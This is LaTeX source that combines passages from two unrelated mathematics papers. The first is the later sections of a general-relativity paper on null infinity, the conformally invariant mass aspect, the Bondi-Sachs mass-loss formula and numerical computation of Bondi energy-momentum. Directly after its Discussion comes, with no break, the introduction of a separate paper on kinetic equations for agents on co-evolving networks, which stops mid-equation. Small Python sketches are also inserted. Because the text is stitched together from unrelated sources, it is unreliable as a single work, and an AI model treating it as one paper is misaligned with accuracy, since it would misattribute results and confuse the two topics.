Taking this expression as a starting point we consider now a more general sphere $\mathcal{S}$ in Minkowski space and two functions $U$ and $V$ on it. We first assume the sphere to have a constant radius $R$. Then we find that for dimensional reasons we should consider the expression
\[
G[U,V] = \frac1{R^2} UV + U \eth\etp V + V \eth\etp U - \eth U \etp V - \eth V \etp U.
\]
Applying $\eth$ to this equation and using the commutator equation $[\eth,\etp]\alpha = -sR^{-2} \alpha$ for any quantity $\alpha$ with spin-weight $s$ on a sphere of radius $R$ we obtain
\[
\eth G[U,V] = - \eth^2 U\, \etp V - \eth^2 V\, \etp U,
\]
showing that $G[U,V]$ is constant on $\mathcal{S}$ if and only if $U$ and $V$ satisfy the equation $\eth^2U=0=\eth^2V$.
Next, we consider the general case. Again, we need to make adjustments to the formula. This time, it is natural to replace the $R^{-2}$-term with the Gauß curvature of the sphere and in view of the conformal invariance we use the conformal density $\mathcal{Q}$. Furthermore, we consider the quadratic form $q[U]:=G[U,U]$ since the bilinear form can be obtained by polarisation and we use the general conformally invariant derivatives. This puts our focus onto the quadratic expression (and its associated bilinear form $G[U,V]$)
\begin{equation}
\label{eq:44}
q[U] = 2\mathcal{Q} U^2 + 2U \ethc\etbc U - 2\ethc U \etbc U
\end{equation}
defined in terms of a scalar $U$ on $\mathscr{I}$. First, we note that this expression is a conformal density and if $U$ has weights $U:[1;0,0]$ then $q[U]$ is a scalar, i.e., all its weights vanish. Furthermore, a short calculation shows that
\[
\ethc q[U] = 2\etbc\left( U \left[\ethc[2]U - R U\right]\right).
\]
In a similar way we compute
\[
{\thorp_c} q[U] = 2G[{\thorp_c} U,U].
\]
This shows that $q[U]$ is constant on an $s$-cut if and only if $\ethc[2]U = R U$, since $\etbc \eta=0$ has only the trivial solution for $\eta$ with weights $[0;2,-2]$. Since $q[U]$ is conformally invariant we can evaluate it in any gauge. Doing this in a Bondi system reduces $q[U]$ to $G[U,U]$ with $G$ as given in~\eqref{eq:43} on any Bondi cut. Since this is a non-degenerate bilinear form, we find that ${\thorp_c} q[U] = 0$ if and only if ${\thorp_c} U=0$. Thus, we have shown that $q[U]$ is constant on $\mathscr{I}$ if and only if $U\in\mathscr{T}$, so that $q[U]$ is a quadratic form with Lorentzian signature on $\mathscr{T}$, which we take as the definition of the Lorentz metric on the space $\mathscr{T}$ of asymptotic translations.
When rewriting the quadratic form with respect to the usual $\eth$ and $\etp$-operators we obtain
\begin{equation}
q[U] = 2K U^2 + 2 U \eth\etp U - 2 \eth U \etp U.\label{eq:45}
\end{equation}
Now recall that $K=\frac12 k[g]$, where $k[g]$ is the Gauß curvature of the induced metric $g_{ab}$ on the cut through the point where $q[U]$ is evaluated, and that the Gauß curvature transforms under a conformal rescaling $g_{ab} \mapsto \Theta^2 g_{ab}$ as follows
\[
k[\Theta^2g] = \Theta^{-2}\left(k[g] - 2\Theta\, \eth\etp \Theta + 2\eth\Theta\, \etp\Theta \right).
\]
Rewriting this in terms of $K$ we get the equation
\begin{equation}
\label{eq:46}
\Theta^2K[\Theta^2g] + \Theta\, \eth\etp \Theta - \eth\Theta\, \etp\Theta = K[g] .
\end{equation}
Suppose now that $U$ does not vanish anywhere; then we can replace $g$ with $U^{-2}g$ and, comparing with \eqref{eq:45}, we find
\begin{equation}
q[U] = 2 (U^2K[g] + U\, \eth\etp U - \eth U\, \etp U) = 2 K[U^{-2}g].\label{eq:47}
\end{equation}
Therefore, we find that $q[U]=1$, i.e., $U$ is normalised, if and only if $U^{-2}g_{ab}$ has Gauß curvature equal to $1$, i.e., it is the metric on the unit-sphere.
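As a simple consistency check, evaluate~\eqref{eq:45} on a cut with the unit-sphere metric ($K=\frac12$), using the spin-weight zero relations $\eth\etp U = \frac12\Delta U$ (so that $\eth\etp\cos\theta=-\cos\theta$) and $2\,\eth U\,\etp U = \nabla_aU\nabla^aU$; we assume here a normalisation of $\eth$ in which these relations hold, conventions differing by factors of $\sqrt2$. Then
\[
q[1] = 2K = 1, \qquad q[\cos\theta] = \cos^2\theta - 2\cos^2\theta - \sin^2\theta = -1,
\]
so the constant function is a normalised time translation while $\cos\theta$ is a normalised space-like translation, in accordance with the Lorentzian signature of $q$.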
\section{The mass aspect}
\label{sec:mass-aspect}
We are now ready to discuss the main ingredient in the definition of the Bondi energy-momentum, the mass aspect. We take as our starting point the definition given in \cite{Penrose:1986}
\[
\mathfrak{m} = A^{-1}\left(\sigma \Phi_{20} - A \psi_2\right).
\]
As it stands, this expression is neither real nor conformally invariant. We address both issues next.
As mentioned in sec.~\ref{sec:asympt-flatn-struct} the imaginary part of \eqref{eq:19} is intrinsic to $\mathscr{I}$ and it yields the following equation
\[
-\etp\Phi_{01} + \eth\Phi_{10} = {\bar\sigma} \Phi_{02} - \sigma \Phi_{20} +A \psi_2 - A {\bar\psi}_2,
\]
which after inserting \eqref{eq:9} becomes
\begin{equation}
\label{eq:48}
- A \psi_2 + \sigma \Phi_{20} + \etp^2\sigma = - A {\bar\psi}_2 + {\bar\sigma} \Phi_{02} + \eth^2{\bar\sigma} ,
\end{equation}
so that the addition of the $\etp^2\sigma$ term yields a real quantity.
However, this expression is still not conformally invariant. As it stands, it is the result of evaluating a conformal density in a Bondi system, which is defined by $\rho'=0$ and $\tau=0$. We can find out what the full expression must look like by transforming to a different gauge and observing which terms appear. This calculation suggests defining a conformal density $N$ of weights $[-2;-2,2]$ by
\begin{equation}
\label{eq:49}
N = \Phi_{20} - \rho' {\bar\sigma} - \etp{\bar\tau} + {\bar\tau}^2.
\end{equation}
We will see below that it is closely related to Bondi's \emph{news function}. Now we can define the mass-aspect $\mathfrak{m}$ as a conformal density $\mathfrak{m}:[-3;0,0]$ by the equation
\begin{equation}
\label{eq:50}
A \mathfrak{m} = - A\psi_2 + \sigma N + \etbc[2]\sigma.
\end{equation}
Note the appearance of the conformal $\etbc$ operator here. The advantage of writing $\mathfrak{m}$ in this way is that it becomes manifestly conformally invariant since each term is a conformal density. However, when rewritten in terms of the usual $\etp$-operator then the mass-aspect becomes almost the familiar expression, namely
\[
\mathfrak{m} = A^{-1}\left(- A\psi_2 + \sigma \Phi_{20} + \etp^2\sigma - \rho' \sigma{\bar\sigma} \right).
\]
The next step is to compute the derivative of $\mathfrak{m}$ along the generators. To do this we need to find the ${\thorp_c}$-derivatives of the quantities defining the mass-aspect. The easy ones are
\[
{\thorp_c} A = 0,\qquad {\thorp_c} \sigma = -\overline{N}.
\]
Next we compute the derivatives of $N$. After a calculation using \eqref{eq:23} we find the result
\begin{equation}
\label{eq:51}
{\thorp_c} N = A \psi_4 - \etbc \overline{\cP}.
\end{equation}
Similarly, using the difference of \eqref{eq:20} and \eqref{eq:21} we find that
\begin{equation}
\label{eq:52}
\ethc N = A \psi_3 + \etbc \mathcal{Q}.
\end{equation}
The derivative of $\mathfrak{m}$ along the generators can be computed in a straightforward way using the intrinsic equations that we have just established. We find the intriguing formula
\begin{equation}
\label{eq:53}
A {\thorp_c} \mathfrak{m} = - N\overline{N} - \ethc[2]N - \etbc[2]\overline{N} + \ethc\etbc \mathcal{Q} .
\end{equation}
\section{The mass-loss formula}
\label{sec:mass-loss-formula}
At this point we have everything in place to discuss the Bondi-Sachs mass-loss formula.
We first define the following integral for a given cut $\mathcal{C}$ of $\mathscr{I}$ and an arbitrary conformal density $U$ with weights $[1;0,0]$
\begin{equation}
\label{eq:54}
4\pi m_\mathcal{C}[U] = \int_{\mathcal{C}}U\left(\sigma N + \etbc[2]\sigma - A \psi_2 \right) A^{-1}\, \mathrm{d}^2\mathcal{S}.
\end{equation}
Here, $\mathrm{d}^2\mathcal{S}=\i\overline{\mathbf{m}}\mathbf{m}$ is the area 2-form on $\mathcal{C}$ induced from the unphysical metric $g_{ab}$. Note that with $U$ of the given type the integral is well-defined in the sense that the integrand is a conformal density with vanishing weights, so that the value is unambiguously defined.
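As a quick check of the weights: $\sigma N$, $\etbc[2]\sigma$ and $A\psi_2$ each carry weights $[-4;1,1]$, while the area 2-form carries $[2;0,0]$ since each of $\mathbf{m}_a$ and $\overline{\mathbf{m}}_a$ picks up one factor of $\Theta$. Hence
\[
U\left(\sigma N + \etbc[2]\sigma - A \psi_2 \right) A^{-1}\, \mathrm{d}^2\mathcal{S}\;:\;
[1;0,0] + [-4;1,1] + [1;-1,-1] + [2;0,0] = [0;0,0],
\]
confirming that the integrand is a scalar.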
The main achievement of the analysis by Bondi and coworkers~\cite{Bondi:1960,Bondi:1962,Sachs:1962a} in the early 1960s is the mass-loss formula, which has since been presented in many different forms. We will provide here another point of view on the mass-loss which highlights the tight interplay between the asymptotic translations and the properties of the mass-aspect. Our presentation follows closely the one given in~\cite{Penrose:1986} based on Stokes' theorem as formulated in app.~\ref{sec:stokes-theorem-cghp}.
Consider the 2-form $\pmb{\mu} = \mu_0\, \i\overline{\mathbf{m}}\mathbf{m} + \mu_1 \i \,\mathbf{l}\mathbf{m} - \mu_2\,\i \mathbf{l}\overline{\mathbf{m}}$ on $\mathscr{I}$ defined by
\[
\begin{aligned}
\mu_0 &= A^{-1} U\left(\sigma N + \etbc[2]\sigma - A \psi_2 \right),\\
\mu_1 = \bar{\mu}_2 &= A^{-1}\left(U\ethc (N + \tfrac12 \overline{R}) - \ethc U (N + \tfrac12 \overline{R})\right)
\end{aligned}
\]
then the pull-back of $\pmb{\mu}$ to any cut $\mathcal{C}$, integrated over $\mathcal{C}$, gives the Bondi energy-momentum relative to $U$ evaluated on that cut. Let $\mathcal{C}_1$ and $\mathcal{C}_2$ be any two cuts from the family defined by constant $s$; integrating $\mathrm{d}\pmb{\mu}$ over the 3-dimensional piece $\mathscr{I}_1^2$ between them yields via Stokes' theorem
\[
m_2[U] - m_1[U] = \frac1{4\pi}\int_{\mathscr{I}_1^2} \mathrm{d}\pmb{\mu} .
\]
Using~\eqref{eq:72} we find $\mathrm{d}\pmb{\mu}$ by computing
\[
\begin{multlined}
A\left({\thorp_c}\mu_0 + \ethc\mu_1 + \etbc\mu_2\right) = {\thorp_c} U A \mathfrak{m} - U N\overline{N} - U \ethc[2]N - U\etbc[2]\overline{N} + U\ethc\etbc\mathcal{Q} \\
+ U \ethc[2](N+\tfrac12\overline{R}) - \ethc[2]U\, (N + \tfrac12 \overline{R})
+ U \etbc[2](\overline{N}+\tfrac12R) - \etbc[2]U\, (\overline{N} + \tfrac12 R) \\
= - U N\overline{N} + U(\ethc\etbc\mathcal{Q} + \tfrac12 \ethc[2]\overline{R} + \tfrac12 \etbc[2]R) - UR \, (N + \tfrac12 \overline{R}) - U\overline{R} \, (\overline{N} + \tfrac12 R)\\
- (\ethc[2]U - R U)\, (N + \tfrac12 \overline{R})
- (\etbc[2]U - \overline{R} U)\, (\overline{N} + \tfrac12 R) + {\thorp_c} U A \mathfrak{m}\\
= - U (N\overline{N} + R \, N + \overline{R} \,\overline{N} + R\overline{R})\\
- (\ethc[2]U - R U)\, (N + \tfrac12 \overline{R})
- (\etbc[2]U - \overline{R} U)\, (\overline{N} + \tfrac12 R) + {\thorp_c} U A \mathfrak{m}
\end{multlined}
\]
The form of the first term in the final expression suggests considering the quantity $\mathscr{N} = N+\overline{R}$. Inspection of \eqref{eq:42}, \eqref{eq:51} and \eqref{eq:52} shows that $\mathscr{N}$ satisfies
\begin{equation}
{\thorp_c}\mathscr{N} = A \psi_4, \qquad \ethc\mathscr{N} = A \psi_3,\label{eq:55}
\end{equation}
so that $\mathscr{N}$ can be considered as a potential for the part of the Weyl tensor that is entirely intrinsic to $\mathscr{I}$. Note that these two simultaneous equations for $\mathscr{N}$ can be solved because their integrability condition is the Bianchi equation~\eqref{eq:33} for $k=3$. We will take this as the defining property of the \emph{Bondi news} $\mathscr{N}$.
Now the calculation above proves the following
\begin{thm}[Bondi-Sachs mass-loss formula]
Let $U\in \mathscr{T}$ be an arbitrary translation and let $\mathcal{C}_1$ and $\mathcal{C}_2$ be two arbitrary $s$-cuts, then
\[
m_2[U] - m_1[U] = -\frac1{4\pi}\int_{\mathscr{I}_1^2} U \,\mathscr{N}\bar{\mathscr{N}}\, \mathrm{d}^3V.
\]
Furthermore, if $U$ is a time translation (so that $U>0$) then
\[
m_2[U] < m_1[U] .
\]
\end{thm}
Note that the mass-loss formula holds only if $U$ is an asymptotic translation; therefore, only in this case are we justified in interpreting~\eqref{eq:54} as a component of an energy-momentum. Furthermore, note that $m_\mathcal{C}[U]$ is linear in $U$ and therefore scales with the ``size'' of $U$. Not only for this reason is it important to have a Lorentz metric defined on $\mathscr{T}$, which allows us to normalise $U$. It also allows us to distinguish temporal from spatial translations. Thus, when $U$ is time-like \eqref{eq:54} defines an energy, while for space-like $U$ we get a momentum component.
Finally, we come back to the mass-aspect. We defined it in \eqref{eq:50} without any reference to asymptotic translations, based entirely upon the requirements of reality and conformal invariance. However, in view of the fact that it is integrated against an asymptotic translation, we can now also redefine the mass-aspect due to the following calculation
\[
\begin{multlined}
\int_\mathcal{C} U \left(\sigma N + \etbc[2]\sigma - A\psi_2\right)\,A^{-1}\mathrm{d}^2\mathcal{S} =
\int_\mathcal{C} U \left(\sigma N - A\psi_2\right)\,A^{-1} + \sigma\etbc[2]UA^{-1}\mathrm{d}^2\mathcal{S} \\
= \int_\mathcal{C} U \left(\sigma N - A\psi_2\right)\,A^{-1} + \sigma\overline{R} UA^{-1}\mathrm{d}^2\mathcal{S} =
\int_\mathcal{C} U \left(\sigma \mathscr{N} - A\psi_2\right)\,A^{-1}\mathrm{d}^2\mathcal{S} .
\end{multlined}
\]
Thus, we could also adopt the definition
\begin{equation}
\label{eq:56}
\mathfrak{m} = A^{-1}\left(\sigma \mathscr{N} - A\psi_2\right)
\end{equation}
for the mass-aspect. This definition looks very similar to the one given at the beginning of sec.~\ref{sec:mass-aspect}, except that $N=\Phi_{20}$ is replaced by the news $\mathscr{N}$. Note that this definition is conformally invariant and yields real values when integrated against an asymptotic translation. However, the definitions \eqref{eq:50} and \eqref{eq:56} are not identical as conformal densities on $\mathscr{I}$. They yield the same values only when integrated against an asymptotic translation, i.e., they define the same energy-momentum covector regarded as a linear form on $\mathscr{T}$.
\section{Computing the Bondi energy-momentum}
\label{sec:comp-bondi-energy}
In this final section we want to briefly discuss how one would go about explicitly calculating the Bondi energy and momenta when faced with a representation of $\mathscr{I}$ which is not a Bondi system. Let us assume that we are given a 3-dimensional null hypersurface of a space-time, presented in the form of a family of 2-dimensional cuts labelled by a scalar $s$. We are also given a null tetrad which we can assume to be adapted to the cuts in the sense that $n^a$ points along the null generators and $m^a$ is tangent to the cuts. This can always be achieved by at most two null rotations. On each cut we have all the spin-coefficients and curvature quantities available, all given with respect to some generic fixed coordinate system.
This situation occurs in numerical relativity, when one solves equations which allow full access to null infinity but which deny the possibility to introduce gauges adapted to $\mathscr{I}$ because of some numerically relevant considerations. An example which was the motivation for this work is described in~\cite{Beyer:2017}.
In order to compute an energy-momentum component on a given cut $\mathcal{C}$ one needs two main ingredients: the mass-aspect and an asymptotic translation $U$. The latter is more involved to compute, so we describe it first. We need to select an appropriate solution of the equation~\eqref{eq:39}. The way we proceed is to first compute a conformal factor $\Omega$ which scales the unit-sphere metric to the metric on $\mathcal{C}$. It must satisfy the equation
\begin{equation}
\label{eq:57}
\Omega^2 K + \Omega\, \eth\etp \Omega - \eth \Omega\, \etp \Omega = 1,
\end{equation}
where the $\eth$-operator is defined in terms of the given null tetrad and the corresponding spin-coefficients, and $K$ is also computed from the given data on the cut. This is a non-linear elliptic equation for $\Omega$ which has a unique solution.
The conformal factor $\Omega$ defines a conformal density with weights $[1;0,0]$ so that we can write every asymptotic translation in the form $U=\Omega V$ with a scalar function $V$. Furthermore, from~\eqref{eq:47} we have $q[\Omega] = 1$ so that $\Omega$ satisfies~\eqref{eq:39}. Inserting $U$ into~\eqref{eq:39} we obtain an equation for $V$
\[
2\ethc\Omega\ethc V + \Omega\ethc[2]V = 0.
\]
Rewriting this equation in terms of the usual $\eth$-operator on $\mathcal{C}$ yields
\begin{equation}
\label{eq:58}
\eth\left(\Omega^2\eth V\right) = 0.
\end{equation}
This equation has four linearly independent solutions, one being $V=1$, corresponding to $\Omega$ being a solution of~\eqref{eq:39}. It defines a time-like translation. The other three solutions can be chosen to correspond to translations in three mutually orthogonal space-like directions. To this end one needs the scalar product on $\mathscr{T}$ in order to produce an orthonormal basis for the solution space.
There is one practical aspect related to the use of the quadratic form $q[U]$. As defined in \eqref{eq:44} or \eqref{eq:45} it is a constant \emph{function} on $\mathscr{I}$. For practical purposes it is much better to compute a single number. This is most easily done by integrating the function over the full cut. Let $|\mathcal{C}|$ denote the area of the cut; then, since $q[U]$ is constant for all asymptotic translations, we have
\[
q[U] = \frac2{|\mathcal{C}|} \int_{\mathcal{C}} K U^2 - 2 \eth U\, \etp U\; \mathrm{d}^2\mathcal{S}
\]
after an integration by parts. Note that, in a Bondi frame where $K=\frac12$ and for the time translation given by $U=1$ this formula yields $q[U]=1$ due to the Gauß-Bonnet theorem.
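This normalisation can be checked by a simple quadrature. The following minimal sketch (not part of the paper; it assumes the unit-sphere Bondi-frame value $K=\tfrac12$ and the time translation $U=1$, for which the $\eth$-derivative terms vanish) evaluates $q[U]$ by Gauss--Legendre quadrature in $\cos\theta$:

```python
import numpy as np

# Gauss-Legendre nodes/weights in x = cos(theta); the phi-integral is trivial here.
x, wq = np.polynomial.legendre.leggauss(40)

K = 0.5                  # curvature value of the unit sphere in a Bondi frame
U = np.ones_like(x)      # time translation U = 1; its eth-derivatives vanish

area = 2*np.pi*np.sum(wq)            # |C| = 4*pi
integrand = K*U**2                   # the term -2 (eth U)(eth' U) vanishes for U = 1
q = (2.0/area)*2*np.pi*np.sum(wq*integrand)
print(q)   # -> 1.0 up to round-off, consistent with the Gauss-Bonnet argument
```

By construction the quadrature reproduces $q[U]=1$ for the unit time translation.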
Once the translations have been selected one needs to compute the momenta by integrating them against the mass-aspect. In principle, this can be done by using either of the two definitions of the mass-aspect, but both have disadvantages from a practical point of view: the definition in \eqref{eq:56} involves $R$, which must be obtained by solving an equation, while the definition in \eqref{eq:50} involves a second order derivative. To avoid both issues one can also use the integral
\[
m_\mathcal{C}[U] = \int_{\mathcal{C}} U N (A^{-1}\sigma) - U \psi_2 - \etbc U \etbc (A^{-1}\sigma) \, \mathrm{d}^2\mathcal{S},
\]
which is obtained from \eqref{eq:50} by integrating by parts.
\section{Discussion}
\label{sec:conclusion}
In this work we have presented a treatment of null infinity and the Bondi energy-momentum which is manifestly conformally invariant and makes no reference to any special gauge. Most discussions of the subject jump very quickly to the introduction of a simplifying gauge (which always exists). The only exception seems to be Geroch's discussion~\cite{Geroch:1977} of null infinity (see also \cite{Tafel:2000} for related questions). For us, the motivation to revisit the issue of the Bondi energy-momentum and the interplay with the asymptotic translations arose from the need to compute the Bondi mass under circumstances which are far away from any simplifying gauges. In a related paper~\cite{Frauendiener:2021b} we present our numerical implementation of the present theoretical discussion in an application where we study the response of a black hole to the impact of gravitational waves.
We hope that our treatment of null infinity offers some new insights into the subject. In particular, the characterisation of the Bondi news ``function'' as a potential for the intrinsic part of the Weyl tensor is very simple and gauge independent. In our treatment of the topic we were guided by the notion of conformal invariance. It might be useful to spell out here what is meant by this term. To be sure, the notion of the Bondi-Sachs energy-momentum is a property of the physical space-time and, therefore, only defined for the physical metric. It is not conformally invariant in the sense of giving the same values when the metric is rescaled by an arbitrary conformal factor. Instead, we represent the physical metric $\tilde g_{ab}$ in terms of a conformal factor $\Omega$ and a metric $g_{ab}$ (see~\eqref{eq:1}) as $\tilde g_{ab}=\Omega^{-2}g_{ab}$. Clearly, all physical properties attributed to the metric $\tilde g_{ab}$ should be independent of the specific choice of $\Omega$ and $g_{ab}$ made to represent it, i.e., they should be invariant if $(g_{ab},\Omega)$ is replaced by $(\theta^2g_{ab},\theta\Omega)$ for arbitrary non-vanishing functions $\theta$.
The Lorentzian metric on the space of asymptotic translations seems to have been unknown until now, at least in its explicit form as given here. It is present in all treatments of $\mathscr{I}$ albeit mostly implicitly, being defined in terms of a basis for the translations given by the first four spherical harmonics.
The appearance of the co-curvature $R$ is crucial for the consistency of the entire structure on $\mathscr{I}$. On the one hand, its presence should not surprise us since Geroch had already introduced the corresponding tensorial quantity. However, on the other hand, its importance may have been underestimated until now. It appears in our treatment essentially as an auxiliary field that mediates between $\ethc$ and $\etbc$ equations on $\mathscr{I}$ but clearly it is intimately tied in with the geometric properties of a 2-surface and its embedding into a null hypersurface. It would not be surprising if it turned out that the co-curvature also plays a major role in a satisfactory definition of quasi-local energy-momentum \cite{Szabados:2009,Penrose:1982,Penrose:1984}. This remains to be seen.
Finally, let us comment on the cGHP formalism. In our discussion we have made the assumption that the null tetrad on $\mathscr{I}$ is adapted to some family of cuts of $\mathscr{I}$. The reason for this assumption was merely to simplify the equations because it implies that $\rho$ is real; it is by no means necessary. In fact, there might be an advantage when the only condition imposed on the frame is that $n^a$ be aligned with the null generators of $\mathscr{I}$ and leaving the freedom of a null rotation around that vector. Then the null congruence generated by the transverse null vector $l^a$ is no longer surface forming and $\rho$ acquires an imaginary part. This is the setup that is necessary to discuss the remarkable results by Newman and coworkers~\cite{Adamo:2012} about equations of motion of (charged) particles in a relativistic field being obtained from the asymptotic structure of null infinity alone. It is hoped that the comparative simplicity of the cGHP formalism (at least on $\mathscr{I}$) may help to shed some new light onto these developments which are hidden behind some rather complicated calculations.
\section{Introduction}
Following the seminal work by Boltzmann and Maxwell (cf. \cite{boltzmann,maxwell}), kinetic equations have
emerged as a standard tool for the description of (stochastic) interacting particle systems.
Nowadays their rigorous mathematical treatment as well as the derivation of macroscopic
models (cf. \cite{bouchut,cercignani,cercignani2,cercignani3,glassey,villani}) are reasonably well understood. In many modern applications of interacting
particle systems, in particular in social and biological systems, there is a key ingredient
not included in the basic assumptions of kinetic theory, namely a dynamic network structure
between particles (rather called agents in such systems and thus used synonymously in this paper).
While models in physics assume that interactions happen if particles are spatially close, social
interactions rather follow a network structure between particles, which changes at the same
time as the state of the particles (thus called co-evolution, cf. \cite{thurner} and references therein). A canonical example is
the formation of opinions or norms on social networks, where interactions can only happen if
the agents are connected in the network. On the other hand the network links are constantly
changing, and these processes influence each other: Opinions change if there is a connection,
e.g. for followers of some posts. Vice versa agents may tend to follow others with similar
opinions.
In this paper we thus want to establish an approach towards kinetic equations for interacting
particle systems with co-evolving network structures. We consider processes where each
agent has a state that can change in an interaction and there is a network weight between
two agents (zero if not connected), which can change over time. This includes a variety of
microscopic agent-based models in recent literature. We start from a Liouville-type equation
that describes the evolution of the joint probability measure of the $N$ agent states as well as the
$N(N-1)$ weights between agents (respectively $\frac{N(N-1)}2$ in the case of undirected networks).
From those we derive a moment hierarchy resembling the original BBGKY hierarchy, with
the difference that here we derive equations for the probability measure describing $k$ agent
states and $k(k-1)$ weights between them ($\frac{k(k-1)}2$ in the undirected case).
It turns out that a key difference to standard types of kinetic models without co-evolving
networks (weights) is the difficulty of finding a simple closure relation. Since the one-particle
distribution does not depend on the weights at all, there is obviously no solution of the hierarchy
in the form of product measures (as in the classical Stosszahlansatz of Boltzmann). We show
that such a solution exists only in the case of special solutions that exhibit concentration
in the weight variables. In the general case we propose a closure relation at the level of
the two-particle and single-weight distribution. We discuss the mathematical properties of
the resulting equations as well as the existence of different types of stationary solutions,
which are relevant for processes on social networks (such as opinion formation of social norm
construction).
In several examples we discuss how the kinetic equations and some special forms relate
to agent-based models recently introduced in literature. Among others these microscopic models have been used to simulate the following issues:
\begin{itemize}
\item Opinion formation on social networks, including polarization and the formation of echo chambers
(cf. \cite{baumann,benatti,boschi,chitra,gu,maia,nigam,sugishita})
\item Knowledge networks (cf. \cite{tur}), with state $s$ being a degree of knowledge.
\item Social norm formation and social fragmentation (cf. \cite{kohne,pham,pham2})
\item Biological transport networks (cf. \cite{hu,albi}), with state corresponding to a pressure or similar variable and the weight encoding the capacity of network links.
\end{itemize}
The derivation of macroscopic models in this context is not just a mathematical exercise, but appears to be of high relevance in order to obtain structured predictions about pattern formation in such systems. While agent-based models rely on simulations for special parameter sets, which can hardly be calibrated from empirical data, the analysis of macroscopic models can provide explanations and predictions of patterns and transitions obtained at the collective level. In this way some concerns about agent-based models like their reproducibility and their limitation to special parameter values (cf. \cite{carney,conte,donkin}) can be avoided.
The paper is structured as follows: in Section 2 we discuss a paradigmatic model based on a Vlasov-type dynamics, which allows to highlight the basic ideas and properties of the microscopic models, in particular the description via a distribution of $N$ particles and $N(N-1)$ weights. Section 3 presents a general structure for microscopic models and discusses several special cases with examples from agent-based simulations in literature. In Section 4 we discuss the hierarchy obtained from the moments of the microscopic distribution and its infinite limit. We highlight the non-availability of a closed-form solution in terms of a single particle distribution and the need to describe the system in terms of a pair distribution (the distribution for two particles and the weight between them). As a consequence we also discuss possible closure relations at the level of the pair distribution. These closure relations are further investigated for a minimal model with binary states and weights in Section 5. At this level we can also identify simple structural assumptions for the formation of polarization patterns. Section 6 is devoted to a more detailed mathematical study of the macroscopic version of the paradigmatic model from Section 2, with a particular focus on a closure relation based on the conditional distribution. In Section 7 we further discuss some modelling issues like social balance theory and related processes, which effectively lead to triplet interactions
in weights or states. Finally, we also discuss a variety of
open and challenging mathematical problems for the equations at the level of pair distributions.
\section{A Paradigmatic Model: Vlasov-type Dynamics}
In this section and for the exposition of further arguments we consider the paradigmatic system
\begin{align}
\frac{ds_i}{dt} &= \frac{1}N \sum_{j \neq i} U(s_i,s_j,w_{ij}) \label{eq:microscopic1} \\
\frac{dw_{ij}}{dt} &= V(s_i,s_j,w_{ij}) \label{eq:microscopic2}
\end{align}
in order to highlight the mathematical properties and the derivation of macroscopic equations.
In a similar spirit as \cite{thurner} we will use the continuous time model as a paradigm, but in an analogous way we will also consider other types of interactions leading to kinetic equations in the next section. Here $s_i \in \R^m$ denotes the state variable
and $w_{ij} \in \R$ the weight between nodes $i$ and $j$. This minimal model naturally encodes the typical processes and network co-evolutions as also proposed in \cite{thurner}. The interactions of the states are mediated by the weight on the edge between them, while the change of the weight on an edge depends on the states of the vertices it connects. Note that we have already incorporated a mean-field scaling in the above system; other types of scaling are left for future research. Let us mention that \eqref{eq:microscopic1}, \eqref{eq:microscopic2} shares some similarities with the interaction models with time-varying weights, which have been analyzed in detail in \cite{ayi,mcquade,pouradier}. In their case, however, the weight is independent of $j$, which corresponds to a special solution where $V$ is independent of $s_j$ and the $w_{ij}$ have the same initial value for all $j$.
In many cases it is desirable to have symmetry of the network (corresponding to an undirected graph), i.e. $w_{ij} = w_{ji}$ for $i \neq j$, and no loops, i.e. $w_{ii}=0$. This is preserved by a natural symmetry condition for $V$, namely
\begin{equation} \label{eq:Vsymmetry}
V(s,\sigma,w) = V(\sigma,s,w) \qquad \forall s,\sigma \in \R^m, w \in \R.
\end{equation}
We shall assume that $U$ and $V$ are Lipschitz-continuous functions, which directly implies the existence and uniqueness for \eqref{eq:microscopic1}, \eqref{eq:microscopic2} by the Picard-Lindel\"of Theorem.
\begin{prop}
Let $U: \R^m \times \R^m \times \R \rightarrow \R^m$ and $V: \R^m \times \R^m \times \R \rightarrow \R$ be Lipschitz-continuous functions. Then there exists a unique solution of the initial-value problem for \eqref{eq:microscopic1}, \eqref{eq:microscopic2} such that $s_i \in C^1(\R_+)$, $w_{ij} \in C^1(\R_+)$ . If $w_{ij}(0) = w_{ji}(0)$ for all $i \neq j$ and \eqref{eq:Vsymmetry} is satisfied, then
$w_{ij}(t) = w_{ji}(t)$ for $i \neq j$ and all $t \in \R_+$.
\end{prop}
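A minimal forward-Euler sketch of \eqref{eq:microscopic1}, \eqref{eq:microscopic2} illustrates the propagation of symmetry stated in the proposition. The concrete Lipschitz choices $U(s,\sigma,w)=-w(s-\sigma)$ and $V(s,\sigma,w)=e^{-(s-\sigma)^2}-\kappa w$ below are purely illustrative assumptions:

```python
import numpy as np

rng = np.random.default_rng(0)
N, dt, kappa = 20, 0.01, 1.0
s = rng.normal(size=N)                                 # scalar states (m = 1)
w = rng.uniform(size=(N, N)); w = (w + w.T)/2          # symmetric initial weights
np.fill_diagonal(w, 0.0)                               # no loops

def U(si, sj, wij): return -wij*(si - sj)              # K(s) = s, an odd kernel
def V(si, sj, wij): return np.exp(-(si - sj)**2) - kappa*wij  # symmetric in (si, sj)

for _ in range(500):                                   # explicit Euler steps
    ds = np.zeros(N); dw = np.zeros((N, N))
    for i in range(N):
        for j in range(N):
            if i == j: continue
            ds[i] += U(s[i], s[j], w[i, j])/N
            dw[i, j] = V(s[i], s[j], w[i, j])
    s += dt*ds; w += dt*dw; np.fill_diagonal(w, 0.0)

print(np.max(np.abs(w - w.T)))   # symmetry w_ij = w_ji is preserved along the flow
```

Since $V$ satisfies \eqref{eq:Vsymmetry} and the initial weights are symmetric, the discrete flow keeps $w_{ij}=w_{ji}$ exactly.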
Let us mention a canonical example of the interactions, namely
\begin{equation} \label{eq:Uexample}
U(s_i,s_j,w_{ij}) = - w_{ij} K(s_i-s_j)
\end{equation}
with an odd kernel $K$ (e.g. $K=\nabla G$ for an even and attractive potential) and
\begin{equation} \label{eq:Vexample}
V(s_i,s_j,w_{ij}) = \eta(s_i-s_j) - \kappa w_{ij}
\end{equation}
with nonnegative kernels $\eta$ and $\kappa$. Here $w_{ij}$ directly plays the role of the interaction strength; the weight is increased when the states $s_i$ and $s_j$ are close and decays with relaxation time $\kappa^{-1}$. If $\eta = - c G$ for some constant $c > 0$, then the model \eqref{eq:microscopic1}, \eqref{eq:microscopic2} has a gradient structure of the form
\begin{equation} \label{eq:microscopicgf}
\frac{ds_i}{dt} = - \nabla_{s_i} E^N, \qquad \frac{dw_{ij}}{dt} = - 2 c N \partial_{w_{ij}} E^N \end{equation}
with the microscopic energy functional
\begin{equation}
